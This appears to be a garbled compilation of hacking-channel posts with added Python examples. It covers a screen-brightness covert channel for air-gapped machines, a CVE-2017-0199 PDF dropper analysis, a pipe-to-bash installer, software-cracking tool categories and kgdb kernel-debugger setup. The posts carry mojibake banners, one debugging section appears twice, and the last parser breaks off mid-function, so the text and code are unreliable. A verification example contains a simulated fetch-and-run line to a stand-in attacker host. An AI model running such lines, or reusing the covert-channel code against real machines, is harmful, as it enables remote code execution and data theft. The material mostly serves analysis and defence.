β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Updated 2019: search API docs offline, in the terminal or a browser:
> dasht is a collection of shell scripts for searching, browsing, and managing API documentation (in the form of 150+ offline documentation sets, courtesy of Dash for OS X), all from the comfort of your own terminal!
T.me/UndercOdeTesting
🦑 INSTALLATION & RUN:
1) git clone https://github.com/sunaku/dasht
2) Add the bin/ folder to your PATH environment variable (appending it, as below, keeps the cloned scripts from shadowing system binaries):
> export PATH=$PATH:location_where_you_cloned_or_downloaded_dasht/bin
3) Add the man/ folder to your MANPATH environment variable:
> export MANPATH=location_where_you_cloned_or_downloaded_dasht/man:$MANPATH
4) Source this file in ZSH to activate TAB completion for dasht:
> source location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions.zsh
Or simply add the completions/ directory to your ZSH $fpath if you have already set up ZSH's completion system elsewhere:
> fpath+=location_where_you_cloned_or_downloaded_dasht/etc/zsh/completions/
🦑 TO RUN
1) Install a documentation set, for example bash:
> dasht-docsets-install bash
2) Next, perform a direct search from the terminal using dasht(1):
> dasht 'c - x'
3) Then repeat the search in a web browser using dasht-server(1):
> dasht-server
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Researchers manage to steal data by manipulating computer screen brightness
Recently from UndercOde tweets: twitter.com/UndercOdeTC
> Computers in government, banks, businesses, industry and military institutions often operate in a strictly controlled environment: they are disconnected from the Internet and subject to strict supervision. Although these measures make them harder to compromise, several covert channels have been explored in the past that use computer sounds, heat, and even hard-drive activity LEDs to leak encoded data from an air-gapped machine. The latest attempt covertly changes the brightness of the display, captures the video stream with a surveillance camera, and finally decodes the data through image processing.
> Researchers have been able to extract data from computers simply by changing the brightness level of the screen, as part of a new type of optical covert channel that relies on the limits of human vision: the changes are too small for the user at the screen to notice, but a camera can still measure them. According to The Hacker News, Dr Mordechai Guri, head of the Cyber Security Research Center at Ben-Gurion University in Israel, conducted the study with two colleagues.
@UndercOdeOfficial
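As an added illustration (my code, not the article's and not the researchers' tooling), here is a toy model of that channel in Python: a sender nudges the screen's mean brightness by a few percent to key bits, a camera samples one luminance value per frame with sensor noise, and the receiver recovers the bits using a known preamble to set its decision threshold. The brightness levels, step size, preamble and noise model are assumptions made for the simulation, not the paper's parameters.

```python
import random
import statistics

# Assumed simulation parameters (not the paper's values).
BASE = 0.60                           # nominal screen brightness on a 0..1 scale
DELTA = 0.03                          # 3% step for a '1' bit: invisible to a user, measurable by a camera
PREAMBLE = [1, 0, 1, 0, 1, 1, 0, 0]   # sync pattern known to both ends
MIN_SEPARATION = 0.015                # below this the receiver declares "no channel"


def bytes_to_bits(data):
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits):
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(str(b) for b in bits[i:i + 8]), 2))
    return bytes(out)


def transmit(payload, frames_per_bit=4):
    """Sender: on-off keying of the whole-frame brightness, one symbol per
    frames_per_bit frames. Returns the brightness the screen shows per frame."""
    frames = []
    for bit in PREAMBLE + bytes_to_bits(payload):
        frames.extend([BASE + (DELTA if bit else 0.0)] * frames_per_bit)
    return frames


def camera_samples(frames, noise_std=0.005, seed=7):
    """Camera: mean luminance measured per frame, with Gaussian sensor noise
    (seeded so the run is reproducible)."""
    rng = random.Random(seed)
    return [f + rng.gauss(0.0, noise_std) for f in frames]


def receive(samples, frames_per_bit=4):
    """Receiver: average each symbol period, derive the slicing threshold from
    the known preamble, then decode the payload symbols. Returns None when the
    preamble shows no usable two-level modulation."""
    n_symbols = len(samples) // frames_per_bit
    if n_symbols <= len(PREAMBLE):
        return None
    symbols = [statistics.mean(samples[i * frames_per_bit:(i + 1) * frames_per_bit])
               for i in range(n_symbols)]
    pre = symbols[:len(PREAMBLE)]
    lo = statistics.mean(v for v, b in zip(pre, PREAMBLE) if b == 0)
    hi = statistics.mean(v for v, b in zip(pre, PREAMBLE) if b == 1)
    if hi - lo < MIN_SEPARATION:
        return None
    threshold = (lo + hi) / 2
    bits = [1 if s > threshold else 0 for s in symbols[len(PREAMBLE):]]
    return bits_to_bytes(bits)


def demo(payload=b"key"):
    """Full round trip: screen -> camera -> decoder."""
    return receive(camera_samples(transmit(payload)))
```

The same statistic the receiver relies on, a small but regular two-level split in per-frame luminance, is what a camera-side detector would look for; the countermeasure the channel cannot beat is denying cameras a line of sight to the screens of air-gapped machines.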
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 CVE-2017-0199 Vulnerability Exploit Sample Analysis BY UndercOde
instagram.com/UNdercOdeTestingCompany
🦑 LET'S START:
> MD5: 0087AA25E20070186AC171BE6C528DA6
> File size: 31752 bytes (31 KB)
> File type: PDF
The initial sample is disguised as a PDF. Hidden in its PDF stream objects are a Word document and a piece of JavaScript. When the PDF is opened the JavaScript executes and invokes whatever application is associated with Word files on the machine to open the embedded document. If that application is a vulnerable version of Office, it follows the malicious link embedded in the Word file automatically and downloads the payload (this is the CVE-2017-0199 bug). Viewing each segment of the PDF with PDFStreamDumper shows the Word file sitting in an embedded stream object.
🦑 Attack payload
File MD5: AAFD0EBFE1AFBCAE1834430FEEBD5A31
File type: BinExecute/Microsoft.EXE[:X86] (32-bit Windows PE)
> Compiler/packer: NSIS. The sample is an NSIS-packaged program. When run, it drops collages.dll, Corticoid.cab and System.dll from its resources (System.dll is the harmless NSIS helper plugin). It loads System.dll with LoadLibraryExA; System.dll then resolves the address of collages.dll and loads it with LoadLibraryA. collages.dll decrypts the compressed Corticoid.cab, which holds the sample's core shellcode.
> collages.dll then uses process injection: it creates a child process, writes the decrypted shellcode into it and executes it there, so the malicious code runs under a benign-looking process for camouflage. Once the sample is recognised as NSIS-packaged, 7-Zip can unpack it and expose the related resource files. The .cab file is deliberately corrupted: its size and file type do not match a real cabinet archive, which is what makes it the suspected shellcode container.
🦑 Note: I loaded the resource files and analysed the two DLLs first, found no malicious code in them, then focused on the .cab file, after circling for a long time inside the packaging program itself. A lot of time was wasted.
by UndercOde
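The triage that PDFStreamDumper does by hand can be scripted. The following is an added example (mine, not the analyst's tooling, and it does not contain the real sample): it walks the stream objects of a PDF, inflates FlateDecode streams, and reports the markers this kind of dropper shows, namely JavaScript/OpenAction entries next to a stream whose payload begins with an OLE2 (legacy .doc) or zip (.docx) signature. The bytes returned by build_constructed_sample() are constructed to imitate the structure described above; the indicator list and the suspicion rule are my assumptions, and the parser resolves only direct /Length values.

```python
import re
import zlib

# Indicators a first-pass triage looks for: an assumed shortlist, not exhaustive.
SUSPICIOUS_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                    b"/EmbeddedFile", b"/Launch"]
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File Binary (legacy .doc)
ZIP_MAGIC = b"PK\x03\x04"                          # zip container (e.g. OOXML .docx)

# "N G obj << dict >> stream\n"; the dictionary may not run past an endobj.
STREAM_RE = re.compile(
    rb"(\d+)\s+\d+\s+obj\s*<<((?:(?!endobj).)*?)>>\s*stream\r?\n", re.DOTALL)
# Direct /Length only; an indirect "/Length 5 0 R" is not resolved here.
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?!\s+\d+\s+R)")


def _decode(raw, dictionary):
    """Inflate FlateDecode streams; leave anything else (or corrupt data) as is."""
    if b"/FlateDecode" in dictionary:
        try:
            return zlib.decompress(raw)
        except zlib.error:
            pass
    return raw


def extract_streams(pdf):
    """Return (object number, dictionary, decoded bytes) for every stream object."""
    streams = []
    for m in STREAM_RE.finditer(pdf):
        objnum, dictionary, start = int(m.group(1)), m.group(2), m.end()
        lm = LENGTH_RE.search(dictionary)
        if lm:
            raw = pdf[start:start + int(lm.group(1))]
        else:
            end = pdf.find(b"endstream", start)
            raw = pdf[start:end if end != -1 else len(pdf)].rstrip(b"\r\n")
        streams.append((objnum, dictionary, _decode(raw, dictionary)))
    return streams


def triage_pdf(pdf):
    """Report suspicious names (in the file or inside decoded streams) and
    streams whose payload is an OLE2 or zip container, like the embedded Word file."""
    streams = extract_streams(pdf)
    haystacks = [pdf] + [data for _, _, data in streams]
    names = [n.decode() for n in SUSPICIOUS_NAMES if any(n in h for h in haystacks)]
    embedded = []
    for objnum, _, data in streams:
        if data.startswith(OLE_MAGIC):
            embedded.append((objnum, "ole2"))
        elif data.startswith(ZIP_MAGIC):
            embedded.append((objnum, "zip"))
    return {"streams": len(streams), "names": names, "embedded": embedded}


def is_suspicious(report):
    """Assumed rule: script execution plus an embedded Office container is the
    pattern of this dropper; either signal alone is weaker."""
    script_names = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch"}
    return bool(script_names & set(report["names"])) and bool(report["embedded"])


def build_constructed_sample():
    """Constructed stand-in for the sample (not the real 0087AA25... file): an
    /OpenAction that runs JavaScript, plus a FlateDecode stream whose payload
    starts with the OLE2 magic a legacy .doc would carry."""
    js = b"this.exportDataObject({cName: 'file.doc', nLaunch: 2});"
    doc = OLE_MAGIC + b"\x00" * 64 + b"constructed placeholder for the embedded .doc"
    deflated = zlib.compress(doc)
    return b"".join([
        b"%PDF-1.4\n",
        b"1 0 obj\n<< /Type /Catalog /OpenAction << /S /JavaScript /JS 2 0 R >> >>\nendobj\n",
        b"2 0 obj\n<< /Length %d >>\nstream\n" % len(js) + js + b"\nendstream\nendobj\n",
        b"3 0 obj\n<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n"
        % len(deflated) + deflated + b"\nendstream\nendobj\n",
        b"%%EOF\n",
    ])
```

Run triage_pdf() over a directory of inbound attachments and the embedded list points you straight at the stream to carve out and hand to an OLE parser, which is the step the write-up above did by eye.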
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 JavaScript has npm, Ruby has Gems, Python has pip, and now shell has bpkg: an automated, 2020-updated installer for Kali/Debian/Ubuntu
instagram.com/UndercOdeTestingCompany
🦑 INSTALLATION & RUN:
1) curl -Lo- "https://raw.githubusercontent.com/bpkg/bpkg/master/setup.sh" | bash
2) Or, if you have clib: clib install bpkg/bpkg
🦑 From source:
1) git clone https://github.com/bpkg/bpkg.git
2) cd bpkg
3) ./setup.sh # Will install bpkg in $HOME/.local/bin
4) sudo ./setup.sh # Will install bpkg in /usr/local/bin.
5) PREFIX=/my/custom/directory ./setup.sh # Will install bpkg in a custom directory.
6) Global install for the current user:
> $ bpkg install term -g
7) Then run it:
> $ term
8) Local install:
> $ bpkg install term
> $ ./deps/term/term.sh
9) After a local install the term.sh script is copied as term to the deps/bin directory; you can add this directory to the PATH with
> export PATH=$PATH:/path_to_bpkg/deps/bin
As a bonus, you can specify a specific version:
> $ bpkg install jwerle/suggest.sh@0.0.1 -g
10) For example, you could install git-standup even though it omits package.json, because bpkg falls back to the Makefile and the install target found in it:
$ bpkg install stephenmathieson/git-standup -g
@UndercOdeTesting
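Step 1 pipes a script fetched from GitHub straight into bash, so whatever the server (or anything in the network path) returns is executed with no chance to look at it. As an added example (my code, not part of bpkg), this Python routine does the three things a pipe-to-shell install skips: it saves the script to disk, checks its SHA-256 against a digest you pinned from a source you trust, and only then runs it. The demo function builds a stand-in setup.sh locally so the flow runs offline; fetch_to_file is the only part that touches the network and is not exercised by the demo.

```python
import hashlib
import os
import subprocess
import tempfile
import urllib.request


def fetch_to_file(url, dest):
    """Download the installer to disk instead of piping it into bash, so it
    can be read and hashed before anything runs."""
    with urllib.request.urlopen(url) as resp, open(dest, "wb") as out:
        out.write(resp.read())
    return dest


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_and_run(script, expected_sha256, interpreter="sh"):
    """Execute the script only if its digest matches the pinned value.
    Returns (exit code, stdout)."""
    actual = sha256_file(script)
    if actual != expected_sha256.lower():
        raise ValueError(f"refusing to run {script}: sha256 {actual} != pinned {expected_sha256}")
    proc = subprocess.run([interpreter, script], capture_output=True, text=True)
    return proc.returncode, proc.stdout.strip()


def demo_with_constructed_script():
    """Constructed stand-in for setup.sh so the check runs offline. In real use
    the pinned digest comes from release notes or a signed tag, never from the
    same download."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "setup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho installed\n")
    pinned = sha256_file(script)
    ran = verify_and_run(script, pinned)
    # Simulated tampering after the digest was pinned: one extra line appended.
    with open(script, "a") as f:
        f.write("echo 'curl http://attacker.invalid/x | sh'\n")
    try:
        verify_and_run(script, pinned)
        tampered_rejected = False
    except ValueError:
        tampered_rejected = True
    return {"ran": ran, "tampered_rejected": tampered_rejected}
```

With the git clone route from the "From source" list you get the same benefit for free: setup.sh is on disk and can be read, and a tag or commit hash can be pinned, before it is executed.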
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 The "Reverse Resource Zone" and the tools required for cracking software, by UndercOde
t.me/UndercOdeTesting
> [ Android Tools ] Tools used for reversing Android programs
> [ Debuggers ] Dynamic debugging tools
> [ Disassemblers ] Disassemblers and decompilers (static analysis; the main category)
> [ PEtools ] PE file analysis and packer-detection tools
> [ Packers ] Packing tools
> [ Patchers ] Patching tools
> [ Editors ] Program resource editors and text manipulation tools
> [ Cryptography ] Algorithm-related tools
> [ Unpackers ] Automated unpackers
> [ Dongle ] Dongle-related tools
> [ .NET ] Tools for reversing Microsoft .NET programs
> [ OllyScript ] OllyDbg unpacking scripts and scripts for locating button event handlers
> [ OllyDbg 1.x Plugin ] Plugins for the dynamic debugger OllyDbg 1.x
> [ OllyDbg 2.x Plugin ] Plugins for OllyDbg 2.x
> [ x64dbg Plugin ] Plugins for the dynamic debugger x64dbg
> [ IDA Plugin ] Plugins for the disassembler IDA
> [ Mac OSX ] Tools for reversing Mac OS X programs
> [ Other ] Other related programs
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Why do you need to debug the Linux kernel?
t.me/UndercOdeTesting
> If you want to take this opportunity to sort out the file system.
> sdcardfs: although the amount of code is not very large, with my current familiarity with the Linux source code there are still some difficulties.
> So you need to be able to debug with breakpoints to track the execution flow of the kernel. Through breakpoint debugging you can view the values of variables and the call stack.
> Sharpening the axe does not delay the cutting of firewood: breakpoint debugging makes analysing the kernel source more effective.
@UndercOdeofficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Debugging: using kgdb, kdb and the kernel debugger internals
t.me/UndercodeTesting
1) The kernel has two different debugger front ends (kdb and kgdb) which interface to the debug core. It is possible to use either front end and dynamically transition between them if you configure the kernel properly at compile time and at runtime.
2) Kdb is a simplistic shell-style interface which you can use on a system console with a keyboard or a serial console. You can use it to inspect memory, registers, process lists and dmesg, and even set breakpoints to stop in a certain location. Kdb is not a source-level debugger, although you can set breakpoints and execute some basic kernel run control. Kdb is mainly aimed at doing some analysis to aid in development or diagnosing kernel problems. You can access some symbols by name in kernel built-ins or in kernel modules if the code was built with CONFIG_KALLSYMS.
3) Kgdb is intended to be used as a source-level debugger for the Linux kernel.
4) It is used along with gdb to debug a Linux kernel. The expectation is that gdb can be used to "break in" to the kernel to inspect memory and variables and look through call stack information, similar to the way an application developer would use gdb to debug an application. It is possible to place breakpoints in kernel code and perform some limited execution stepping.
🦑 Requirements:
> Two machines are required for using kgdb.
1) One of these machines is a development machine and the other is the target machine.
2) The kernel to be debugged runs on the target machine. The development machine runs an instance of gdb against the vmlinux file which contains the symbols (not a boot image such as bzImage, zImage or uImage). In gdb the developer specifies the connection parameters and connects to kgdb.
3) The type of connection a developer makes with gdb depends on the availability of kgdb I/O modules compiled as built-ins or loadable kernel modules in the test machine's kernel.
🦑 Compiling a kernel
> In order to enable compilation of kdb, you must first enable kgdb.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Let's start Android debugging 2020
> Kernel config options for kgdb
fb.com/UndercOdeTestingCompany
1) To enable CONFIG_KGDB, look under Kernel hacking -> Kernel debugging and select "KGDB: kernel debugger".
2) While it is not a hard requirement that you have symbols in your vmlinux file, gdb tends not to be very useful without the symbolic data, so you will want to turn on CONFIG_DEBUG_INFO, which is called "Compile the kernel with debug info" in the config menu.
3) It is advised, but not required, that you turn on the CONFIG_FRAME_POINTER kernel option, which is called "Compile the kernel with frame pointers" in the config menu.
4) This option inserts code into the compiled executable which saves the frame information in registers or on the stack at different points, which allows a debugger such as gdb to construct stack back traces more accurately while debugging the kernel.
5) If the architecture that you are using supports the kernel option CONFIG_STRICT_KERNEL_RWX, you should consider turning it off.
6) This option prevents the use of software breakpoints because it marks certain regions of the kernel's memory space as read-only. If kgdb supports it for your architecture, you can use hardware breakpoints and keep CONFIG_STRICT_KERNEL_RWX turned on; otherwise you need to turn the option off. Do this only on a throwaway debug build: with the option off the kernel's own text is writable, and a kgdb-enabled kernel hands full memory read/write to whoever controls the debug serial port, so neither belongs in a kernel you ship.
7) Next, choose one or more I/O drivers to interconnect the debugging host and the debugged target. Early boot debugging requires a KGDB I/O driver that supports early debugging, and that driver must be built into the kernel directly. Kgdb I/O driver configuration takes place via kernel or module parameters.
🦑 Here is an example set of .config symbols to enable or disable for kgdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
> Kernel config options for kdb
Kdb is quite a bit more complex than the simple gdbstub sitting on top of the kernel's debug core. Kdb must implement a shell, and also adds some helper functions in other parts of the kernel, responsible for printing out interesting data such as what you would see if you ran lsmod or ps.
8) In order to build kdb into the kernel you follow the same steps as you would for kgdb.
9) The main config option for kdb is CONFIG_KGDB_KDB, which is called "KGDB_KDB: include kdb frontend for kgdb" in the config menu. In theory you would already have selected an I/O driver such as CONFIG_KGDB_SERIAL_CONSOLE when configuring kgdb, if you plan on using kdb on a serial port.
10) If you want to use a PS/2-style keyboard with kdb, select CONFIG_KDB_KEYBOARD, which is called "KGDB_KDB: keyboard as input device" in the config menu. CONFIG_KDB_KEYBOARD is not used for anything in the gdb interface to kgdb; it only works with kdb.
11) Here is an example set of .config symbols to enable/disable for kdb:
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
> Kernel debugger boot arguments
This section describes the runtime kernel parameters that affect the configuration of the kernel debugger.
12) Kernel parameter: kgdboc
The name kgdboc was originally an abbreviation of "kgdb over console". Today it is the primary mechanism to configure how gdb communicates with kgdb, as well as which devices you want to use to interact with the kdb shell.
13) For kgdb/gdb, kgdboc is designed to work with a single serial port. It is intended to cover the circumstance where you want to use a serial console as your primary console as well as using it to perform kernel debugging. It is also possible to use kgdb on a serial port which is not designated as a system console. Kgdboc may be configured as a kernel built-in or as a loadable module.
14) You can only make use of kgdbwait and early debugging if you build kgdboc into the kernel as a built-in.
Optionally you can elect to activate kms (Kernel Mode Setting) integration. When you use kms with kgdboc and you have a video driver that has atomic mode setting hooks, it is possible to enter the debugger on the graphics console. When the kernel execution is resumed, the previous graphics mode will be restored. This integration can serve as a useful tool to aid in diagnosing crashes or doing analysis of memory with kdb while allowing the full graphics console applications to run.
Written by UndercOde
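The option list above is easy to get half right. As an added check (my script, not from the kernel documentation or from UndercOde), this Python code parses a .config in the "CONFIG_X=y" / "# CONFIG_X is not set" form, reports what a kgdb/kdb debug build still needs, and, run the other way, lists the debugger options that must not be present in a kernel you ship. Treating CONFIG_KGDB_SERIAL_CONSOLE as the required I/O driver (the one the examples use) and the two constructed .config fragments are my assumptions.

```python
import re

# Matches "CONFIG_X=value" or "# CONFIG_X is not set".
LINE_RE = re.compile(r"^(?:(CONFIG_\w+)=(\S+)|#\s*(CONFIG_\w+) is not set)$")

# Assumed: the serial console is the chosen kgdb I/O driver.
REQUIRED_KGDB = {"CONFIG_KGDB": "y", "CONFIG_KGDB_SERIAL_CONSOLE": "y"}
REQUIRED_KDB = {"CONFIG_KGDB_KDB": "y"}
RECOMMENDED = {"CONFIG_DEBUG_INFO": "y", "CONFIG_FRAME_POINTER": "y"}
DEBUGGER_SYMBOLS = ("CONFIG_KGDB", "CONFIG_KGDB_KDB", "CONFIG_KGDB_SERIAL_CONSOLE")


def parse_config(text):
    """Map CONFIG_ symbols to their value; '# CONFIG_X is not set' becomes 'n'."""
    opts = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        if m.group(1):
            opts[m.group(1)] = m.group(2)
        else:
            opts[m.group(3)] = "n"
    return opts


def check_debug_config(text, want_kdb=False, want_keyboard=False):
    """Return (errors, warnings) for a kgdb (and optionally kdb) debug build."""
    opts = parse_config(text)
    errors, warnings = [], []
    required = dict(REQUIRED_KGDB)
    if want_kdb:
        required.update(REQUIRED_KDB)
    if want_keyboard:
        if not want_kdb:
            errors.append("CONFIG_KDB_KEYBOARD only works with kdb; set want_kdb=True")
        required["CONFIG_KDB_KEYBOARD"] = "y"
    for sym, val in required.items():
        if opts.get(sym, "n") != val:
            errors.append(f"{sym} must be {val} (is {opts.get(sym, 'unset')})")
    for sym, val in RECOMMENDED.items():
        if opts.get(sym, "n") != val:
            warnings.append(f"{sym}={val} recommended for usable symbols and backtraces")
    if opts.get("CONFIG_STRICT_KERNEL_RWX") == "y":
        warnings.append("CONFIG_STRICT_KERNEL_RWX=y: software breakpoints will not work; "
                        "use hardware breakpoints or unset it on the debug build only")
    return errors, warnings


def production_risks(text):
    """The opposite check: debugger options that a shipping kernel must not carry."""
    opts = parse_config(text)
    return [sym for sym in DEBUGGER_SYMBOLS if opts.get(sym) == "y"]


# Constructed fragments: a hardened default and a debug build in the page's style
# (CONFIG_DEBUG_INFO added to the latter, as item 2 recommends).
PRODUCTION_CONFIG = """\
CONFIG_STRICT_KERNEL_RWX=y
# CONFIG_FRAME_POINTER is not set
# CONFIG_KGDB is not set
"""

DEBUG_CONFIG = """\
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_DEBUG_INFO=y
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y
"""
```

Run production_risks() over the .config of every kernel you build for release; a stray CONFIG_KGDB=y left over from a debug session is exactly the kind of thing that survives into a shipped image.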
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 Details for Android debugging
twitter.com/UndercOdeTC
🦑 LET'S START:
a) kgdboc arguments
1) kgdboc=[kms][[,]kbd][[,]serial_device][,baud]
The order listed above must be observed if you use any of the optional configurations together.
Abbreviations:
kms = Kernel Mode Setting
kbd = Keyboard
You can configure kgdboc to use the keyboard and/or a serial device, depending on whether you are using kdb and/or kgdb. Using kms with only gdb is generally not a useful combination.
2) Using a loadable module or built-in
As a kernel built-in:
> Use the kernel boot argument:
kgdboc=<tty-device>,[baud]
As a kernel loadable module:
🦑 Use the command:
modprobe kgdboc kgdboc=<tty-device>,[baud]
Here are two examples of how you might format the kgdboc string. The first is for an x86 target using the first serial port. The second is for the ARM Versatile AB using the second serial port.
kgdboc=ttyS0,115200
kgdboc=ttyAMA1,115200
Configure kgdboc at runtime with sysfs
At run time you can enable or disable kgdboc by echoing parameters into sysfs. Here are two examples:
🦑 Enable/disable kgdboc on ttyS0:
1) Enable:
> echo ttyS0 > /sys/module/kgdboc/parameters/kgdboc
2) Disable kgdboc:
> echo "" > /sys/module/kgdboc/parameters/kgdboc
Whoever can write this sysfs file can attach a debugger to the running kernel, and anyone with access to the chosen serial port then has full read/write of kernel memory, so keep kgdboc unset on anything but a debug box.
🦑 More examples by UndercOde
You can configure kgdboc to use the keyboard and/or a serial device, depending on whether you are using kdb and/or kgdb, in one of the following scenarios.
1) kdb and kgdb over only a serial port:
kgdboc=<serial_device>[,baud]
Example:
kgdboc=ttyS0,115200
2) kdb and kgdb with a keyboard and a serial port:
kgdboc=kbd,<serial_device>[,baud]
Example:
kgdboc=kbd,ttyS0,115200
3) kdb with a keyboard:
kgdboc=kbd
4) kdb with kernel mode setting:
kgdboc=kms,kbd
5) kdb with kernel mode setting and kgdb over a serial port:
kgdboc=kms,kbd,ttyS0,115200
Written by UndercOde
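Because the kgdboc string is positional, a wrong order silently means something else (a serial device named "kms", for instance). As an added example (my code, not kernel code), this Python parser implements the grammar above, builds strings in the correct order, and produces the sysfs command from the runtime section; the warning about kms without kbd is the one the text states. The KgdbocError class, is_malformed() and advise() are my own helpers, and the parser does not check that the device name exists on the target.

```python
class KgdbocError(ValueError):
    """Raised for a string the grammar does not allow."""


def parse_kgdboc(value):
    """Parse kgdboc=[kms][[,]kbd][[,]serial_device][,baud]. The empty string is
    the 'disable' form that the sysfs example writes."""
    rest = value.strip()
    cfg = {"kms": False, "kbd": False, "device": None, "baud": None}
    for flag in ("kms", "kbd"):            # fixed order; the comma after each is optional
        if rest.startswith(flag):
            cfg[flag] = True
            rest = rest[len(flag):].lstrip(",")
    if rest:
        parts = rest.split(",")
        if len(parts) > 2 or not parts[0]:
            raise KgdbocError(f"malformed kgdboc string: {value!r}")
        if parts[0] in ("kms", "kbd"):
            raise KgdbocError(f"{parts[0]!r} out of order in {value!r}: kms, then kbd, then the device")
        cfg["device"] = parts[0]
        if len(parts) == 2:
            if not parts[1].isdigit():
                raise KgdbocError(f"baud must be numeric, got {parts[1]!r}")
            cfg["baud"] = int(parts[1])
    return cfg


def is_malformed(value):
    """True when parse_kgdboc rejects the string."""
    try:
        parse_kgdboc(value)
    except KgdbocError:
        return True
    return False


def build_kgdboc(kms=False, kbd=False, device=None, baud=None):
    """Emit the string in grammar order, so callers cannot get the order wrong."""
    if baud is not None and device is None:
        raise KgdbocError("a baud rate needs a serial device")
    parts = [name for name, on in (("kms", kms), ("kbd", kbd)) if on]
    if device:
        parts.append(device)
        if baud is not None:
            parts.append(str(baud))
    return ",".join(parts)


def advise(cfg):
    """Notes for a parsed configuration; the first is the one the text gives."""
    notes = []
    if cfg["kms"] and not cfg["kbd"]:
        notes.append("kms with only gdb (no kbd) is generally not a useful combination")
    if not cfg["kms"] and not cfg["kbd"] and not cfg["device"]:
        notes.append("nothing selected: this string disables kgdboc")
    return notes


def sysfs_command(cfg):
    """Runtime form: the shell line that enables (or, if empty, disables) kgdboc."""
    return 'echo "%s" > /sys/module/kgdboc/parameters/kgdboc' % build_kgdboc(**cfg)
```

Feed the string you are about to put on the kernel command line through parse_kgdboc() first; if it comes back with a device you did not intend, the order is wrong.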
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Details for android debugg
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
a) kgdboc arguments
1) kgdboc=[kms][[,]kbd][[,]serial_device][,baud]
The order listed above must be observed if you use any of the optional configurations together.
Abbreviations:
kms = Kernel Mode Setting
kbd = Keyboard
You can configure kgdboc to use the keyboard, and/or a serial device depending on if you are using kdb and/or kgdb, in one of the following scenarios. The order listed above must be observed if you use any of the optional configurations together. Using kms + only gdb is generally not a useful combination.
2) Using loadable module or built-in
As a kernel built-in:
> Use the kernel boot argument:
kgdboc=<tty-device>,[baud]
As a kernel loadable module:
π¦ Use the command:
modprobe kgdboc kgdboc=<tty-device>,[baud]
Here are two examples of how you might format the kgdboc string. The first is for an x86 target using the first serial port. The second example is for the ARM Versatile AB using the second serial port.
kgdboc=ttyS0,115200
kgdboc=ttyAMA1,115200
Configure kgdboc at runtime with sysfs
At run time you can enable or disable kgdboc by echoing a parameters into the sysfs. Here are two examples:
π¦ Enable/disable
kgdboc on ttyS0:
1) enable :
> echo ttyS0 > /sys/module/kgdboc/parameters/kgdboc
2) Disable kgdboc:
> echo "" > /sys/module/kgdboc/parameters/kgdboc
π¦ More examples by UndercOde
1) You can configure kgdboc to use the keyboard and/or a serial device, depending on whether you are using kdb and/or kgdb, in one of the following scenarios.
> kdb and kgdb over only a serial port:
kgdboc=<serial_device>[,baud]
2) Example:
kgdboc=ttyS0,115200
kdb and kgdb with a keyboard and a serial port:
kgdboc=kbd,<serial_device>[,baud]
3) Example:
kgdboc=kbd,ttyS0,115200
kdb with a keyboard only:
kgdboc=kbd
kdb with kernel mode setting:
kgdboc=kms,kbd
kdb with kernel mode setting and kgdb over a serial port:
kgdboc=kms,kbd,ttyS0,115200
Written by UndercOde
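As an added example (mine, not from the kernel documentation or from UndercOde), a small Python parser that accepts a kgdboc string, enforces the documented order [kms][[,]kbd][[,]serial_device][,baud], and rejects a baud rate given without a serial device; the names parse_kgdboc and KgdbocError and the tty-name pattern are assumptions.

```python
import re

# Hypothetical helper (not part of the kernel or of kgdboc itself): parse a
# kgdboc string such as "kms,kbd,ttyS0,115200" and enforce the documented
# order [kms][[,]kbd][[,]serial_device][,baud].


class KgdbocError(ValueError):
    pass


def parse_kgdboc(value: str) -> dict:
    """Return {'kms': bool, 'kbd': bool, 'serial': str|None, 'baud': int|None}.

    Raises KgdbocError when a token is unknown, out of order, or a baud rate
    is given without a serial device. An empty string (the sysfs "disable"
    form) yields all-default values.
    """
    if value.startswith("kgdboc="):          # accept the full boot-argument form
        value = value[len("kgdboc="):]
    tokens = [t for t in value.split(",") if t]
    result = {"kms": False, "kbd": False, "serial": None, "baud": None}
    i = 0
    if i < len(tokens) and tokens[i] == "kms":
        result["kms"] = True
        i += 1
    if i < len(tokens) and tokens[i] == "kbd":
        result["kbd"] = True
        i += 1
    # Simplified tty-name check (assumption): matches ttyS0, ttyAMA1, ttyUSB0
    if i < len(tokens) and re.fullmatch(r"tty[A-Za-z]*\d+", tokens[i]):
        result["serial"] = tokens[i]
        i += 1
    if i < len(tokens) and tokens[i].isdigit():
        if result["serial"] is None:
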